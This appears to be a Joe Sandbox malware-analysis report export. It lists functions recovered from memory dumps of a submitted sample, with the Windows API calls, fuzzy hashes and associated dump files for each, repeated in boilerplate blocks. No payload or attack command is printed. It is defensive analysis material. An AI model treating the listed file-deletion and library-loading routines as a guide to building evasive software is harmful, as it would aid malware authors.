Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 548dd97d680d211a0857f339452bb78ea9a4cccf6da1df46d7987ef2035aa8e1
Instruction ID: f38f81fe1136e8c47f8fbefe1bf18c314f58392cd739e1aac5c38a800ffaaa77
Opcode Fuzzy Hash: 548dd97d680d211a0857f339452bb78ea9a4cccf6da1df46d7987ef2035aa8e1
Instruction Fuzzy Hash: A7E02B53F0D546C2D7B5763E6C0A65F02C49FC2331B500B26F410DB0C2CF5CA9434096

Function 006EA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,006EA27A,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,006EA27A,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA489

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 68c5c9e27117c4f2fd2648d05ec6fc6d065578b09381ae9e4065a09499d192ec
Instruction ID: 45c562cb919aaf45a92317106f991c1853443e537abd83058fc2740155620067
Opcode Fuzzy Hash: 68c5c9e27117c4f2fd2648d05ec6fc6d065578b09381ae9e4065a09499d192ec
Instruction Fuzzy Hash: 20F0A73124124DBBDF015F61DC05FD93BAEBB04381F04C055BC48861A1DB769AA4AA54

Function 006FD573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006FD5A1
SetDlgItemTextW.USER32(00000065,?), ref: 006FD5B8

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: fd7e1434061b1e4e6b869f61400f301160e8df11fad5c76cae219a33892bc185
Instruction ID: de63a78e940600b6605b9a0ed1c07fb59691c8d8a91658d947288007cd0adb50
Opcode Fuzzy Hash: fd7e1434061b1e4e6b869f61400f301160e8df11fad5c76cae219a33892bc185
Instruction Fuzzy Hash: E3F05C7150538C3BDB11BFB08C06FB9371F9B04341F000759B700530B2DA367A214B66

Function 006EA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,006E984C,?,?,006E9688,?,?,?,?,00711FA1,000000FF), ref: 006EA13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,006E984C,?,?,006E9688,?,?,?,?,00711FA1,000000FF), ref: 006EA16C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6a849fadb41aef0105799094cf6ad0c0e49d89dd662730de528f1ee228389fdb
Instruction ID: 0df5642bb2faa99960daecafb1d93aa74565cebfa07e4c7228d5d260538afdaf
Opcode Fuzzy Hash: 6a849fadb41aef0105799094cf6ad0c0e49d89dd662730de528f1ee228389fdb
Instruction Fuzzy Hash: 42E0223524130C6BDB009F61DC01FE93B9EAB09381F488065B888C31A0DB229E94AA94

Function 006FA39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00711FA1,000000FF), ref: 006FA3D1
OleUninitialize.OLE32(?,?,?,?,00711FA1,000000FF), ref: 006FA3D6

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 618250806fc608ec9e257b493148d94d3dcd48317648b8f7ef7fec77918a96cf
Instruction ID: c180d74f6c6e9848e9a548a8247420558097eb7686b73219e70d4c8faae746c6
Opcode Fuzzy Hash: 618250806fc608ec9e257b493148d94d3dcd48317648b8f7ef7fec77918a96cf
Instruction Fuzzy Hash: DCF0A072508644DFC710AB4CDC01B55FBACFB89B20F00836AF409837A0CB396801CA85

Function 006EA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,006EA189,?,006E76B2,?,?,?,?), ref: 006EA1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,006EA189,?,006E76B2,?,?,?,?), ref: 006EA1D1

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5ab6e72b74331ebd9355b401463341f8b88274f7a8eab9c1b9b820122b778825
Instruction ID: ddce3a9040e398c1331bb44b45a987f2fac10cc3ce69e06f220b61985ef95ce5
Opcode Fuzzy Hash: 5ab6e72b74331ebd9355b401463341f8b88274f7a8eab9c1b9b820122b778825
Instruction Fuzzy Hash: DEE09B3550115857CB10AB68DC05BD577AEAB0C3E2F008262FD44D3290D7719D449AD4

Function 006F0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006F00A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,006EEB86,Crypt32.dll,00000000,006EEC0A,?,?,006EEBEC,?,?,?), ref: 006F00C2

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 19f70a308ea7ed540763dd93ddef1ca48c8d1f3fb35fd7455f2b988d697b895f
Instruction ID: d8ae07705f894ba018809d71f20308de51f84c20b0c97aa76858a424cc30301c
Opcode Fuzzy Hash: 19f70a308ea7ed540763dd93ddef1ca48c8d1f3fb35fd7455f2b988d697b895f
Instruction Fuzzy Hash: D0E0927690111C6ADB209AA49C08FE677ADEF0D382F0440A5BA08D3144DA749A408BF4

Function 006F9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 006F9B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 006F9B37

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 3843edddfde8f6a4f4dfa790be0f66a6f937713c2a1578b226afe003041ae20d
Instruction ID: 6210814a16a369e518de69fbb85df2f54d4e541271fd5492f73f621f3d6d2e3b
Opcode Fuzzy Hash: 3843edddfde8f6a4f4dfa790be0f66a6f937713c2a1578b226afe003041ae20d
Instruction Fuzzy Hash: 6AE06D7180120CEFCB50DF98D402BEABBE8EB04321F10805FE98493300E3716E009BA1

Function 0070215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0070329A: try_get_function.LIBVCRUNTIME ref: 007032AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0070217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00702185

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 68cf2a5287d5fbfd89634a99667f8263fb82a7c3f5aa4710372cb04e56f4d2b2
Instruction ID: fc8d24a0a0d2d4041d2b49e262dc9903e8b4089f29f794dd83ea047c6bb8cdb7
Opcode Fuzzy Hash: 68cf2a5287d5fbfd89634a99667f8263fb82a7c3f5aa4710372cb04e56f4d2b2
Instruction Fuzzy Hash: 9FD0A97720430AE4E948B7B42C9E4A823D86A52BB03E04B46E6208A0E3EE1C84436022

Function 006FDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 006FDC73
DloadProtectSection.DELAYIMP ref: 006FDC8F

Part of subcall function 006FDE67: DloadObtainSection.DELAYIMP ref: 006FDE77

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: ea54cb1689d849e8943db00d1a9c92d04fd4df5d9ce05c737af1df53ae4ed389
Instruction ID: d5eaebcf7aefaac624dce71991807ecd00923bcb43d05a4ec014ff58272fb2bb
Opcode Fuzzy Hash: ea54cb1689d849e8943db00d1a9c92d04fd4df5d9ce05c737af1df53ae4ed389
Instruction Fuzzy Hash: 4ED0C974104208CAD255AB1499867FC3677B705788F644606A305865A4DBBC6491E6EE

Function 006E12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 006E12FB
ShowWindow.USER32(00000000), ref: 006E1302

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 256e5727eae2f73ef33c91e44088bedbbe124efa98a8c55adde9878694fbcb7c
Instruction ID: 574d39e9f9db77cf9e23b3daa688785914301d4c683c92192dbd4ebbf34f731a
Opcode Fuzzy Hash: 256e5727eae2f73ef33c91e44088bedbbe124efa98a8c55adde9878694fbcb7c
Instruction Fuzzy Hash: 58C0123A058208BFCB010BB0DC09D2FBBA8ABA6212F05C90AB2A5C0061C33CC020DB19

Function 006E19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E19AB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2c249213574beb7472e821235b4f723bf2d6b5c4a78d9139e1a3fc57457383ff
Instruction ID: 295dcc0baa93764a6dd1f4943fed95986445f95913644829e908b02149f43ec8
Opcode Fuzzy Hash: 2c249213574beb7472e821235b4f723bf2d6b5c4a78d9139e1a3fc57457383ff
Instruction Fuzzy Hash: 6FC1AF70A063849FEF15DF6AC884BE97BA6AF06300F1840B9DC46DF382CB359944DB61

Function 006E3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E3B42

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 94bb7d9a192e6d19f48511666f375167aace7c2ec434fd04d1ec026914d322b5
Instruction ID: 751cfa7a7972d27e56668ba3e6cfcb4ea837d68b25944f3f70e21e8e27be9cf2
Opcode Fuzzy Hash: 94bb7d9a192e6d19f48511666f375167aace7c2ec434fd04d1ec026914d322b5
Instruction Fuzzy Hash: B9710471106F949EDB25DB31CC45AE7B7EAAF14301F44492EE1AB4B342DA31AA48CF10

Function 006E837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E8384

Part of subcall function 006E1380: __EH_prolog.LIBCMT ref: 006E1385
Part of subcall function 006E1380: new.LIBCMT ref: 006E13FE

Part of subcall function 006E19A6: __EH_prolog.LIBCMT ref: 006E19AB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b28c22b1d35d572bcb168da0f9fe04ee2aa4c1009191ca9ed379ee3f0252af10
Instruction ID: d3fdc4ecc7a32d7a02700e576a5e32b0721e4ad0d6cdf39b642ca5d559241c8a
Opcode Fuzzy Hash: b28c22b1d35d572bcb168da0f9fe04ee2aa4c1009191ca9ed379ee3f0252af10
Instruction Fuzzy Hash: 8D41CF318417989EDB60DB62C855BEA73AAEF10300F0440EEA58EA7193DF756AC8DB54

Function 006E1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E1E05

Part of subcall function 006E3B3D: __EH_prolog.LIBCMT ref: 006E3B42

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d2fe0582ae9a09d0621db708c0b4185d5d1d1bc4704a6d86a478a611d8aa831a
Instruction ID: e3dffa902c131e0c651efe6f091ac3c8d1c88bb115992ab55bcb269be8ceb741
Opcode Fuzzy Hash: d2fe0582ae9a09d0621db708c0b4185d5d1d1bc4704a6d86a478a611d8aa831a
Instruction Fuzzy Hash: 7D2159329052489FCB65EF99C9419EEBBF6BF59300B10006EF845AB251CB321E10DB64

Function 006FA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006FA7C8

Part of subcall function 006E1380: __EH_prolog.LIBCMT ref: 006E1385
Part of subcall function 006E1380: new.LIBCMT ref: 006E13FE

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 999327ba6c284f89e0b209d3b31ad437272c19feffd0e7dadd18133179e64805
Instruction ID: 11dedf7a8a21c56de3e25e10548621eadab682dd8db0b62be05677695be5f07d
Opcode Fuzzy Hash: 999327ba6c284f89e0b209d3b31ad437272c19feffd0e7dadd18133179e64805
Instruction Fuzzy Hash: B8218D71C0528DDECF14DF99C9419FEBBB6AF19300F0004AEE819A7242D7756E06DB65

Function 006E92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E92EB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 97cf18f6d439faf8e432d9a1ae6d7c123efcf8adb6563c22a8c20b9518be2609
Instruction ID: c6f8ae52ecbd51ec0d7db0e58858c591a7bdf74f2b8471da85dae9eaffa067db
Opcode Fuzzy Hash: 97cf18f6d439faf8e432d9a1ae6d7c123efcf8adb6563c22a8c20b9518be2609
Instruction Fuzzy Hash: FB11A573D126689BCB22AFADCC419DDB737EF48750F004129F814B7251DA358D1186E4

Function 006E5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E5BDC

Part of subcall function 006EB07D: __EH_prolog.LIBCMT ref: 006EB082

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e9d9654d2dd2c5bffe0f7bc6ba2c38e05e3486295332399c6f975258356515e8
Instruction ID: c0ca43195db953975174fc549791542db96635614f768327cadce812f4a6dec2
Opcode Fuzzy Hash: e9d9654d2dd2c5bffe0f7bc6ba2c38e05e3486295332399c6f975258356515e8
Instruction Fuzzy Hash: F7016D30A067D4EAC765F7A8C0553EEFBA59F19704F44419EA85A532C3CBB42B08C66A

Function 00708518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0070C13D,00000000,?,007067E2,?,00000008,?,007089AD,?,?,?), ref: 0070854A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
